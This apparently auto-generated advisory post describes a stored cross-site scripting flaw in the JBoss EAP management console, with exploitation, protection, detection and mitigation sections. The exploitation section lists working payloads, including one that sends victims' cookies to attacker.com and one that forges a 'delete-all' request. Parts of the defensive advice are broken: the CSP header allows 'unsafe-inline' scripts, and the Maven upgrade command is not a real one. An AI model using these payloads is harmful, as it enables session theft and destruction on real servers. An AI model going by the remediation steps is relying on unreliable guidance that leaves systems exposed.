How the CVE Works
The vulnerability arises when the JBoss EAP Management Console fails to properly sanitize user-supplied input before storing it in the backend database. Attackers can inject malicious JavaScript payloads through input fields, which are then persistently stored. When administrators or users access the affected pages, the stored script executes in their browser context. This allows session hijacking, credential theft, or unauthorized actions under the victim’s permissions. The attack exploits improper output encoding when rendering stored data in the web interface.
DailyCVE Form
Platform: JBoss EAP
Version: < 3.7.11.Final
Vulnerability: Stored XSS
Severity: Critical
Date: May 6, 2025
What Undercode Say:
Exploitation
1. Payload Injection:
<script>alert(document.cookie)</script>
2. Exfiltrate Sessions:
<script>fetch('https://attacker.com/steal?data='+btoa(document.cookie))</script>
3. CSRF + XSS Combo:
<script>fetch('/management-console/delete-all', {method: 'POST'})</script>
Protection
1. Input Sanitization:
String sanitized = ESAPI.encoder().encodeForHTML(userInput);
2. Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'
3. Patch Upgrade:
mvn update org.jboss.hal:hal-core:3.7.11.Final
Detection
1. Scan with ZAP:
zap-cli --scan https://jboss-console.example.com
2. Manual Testing:
'/><img src=x onerror=alert(1)>
Mitigation
1. Disable Console:
<subsystem xmlns="urn:jboss:domain:management:7.0"> <management-interfaces> <http-interface security-realm="ManagementRealm" enabled="false"/> </management-interfaces> </subsystem>
2. Log Monitoring:
grep -r "script>" /var/log/jboss/access.log
References
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
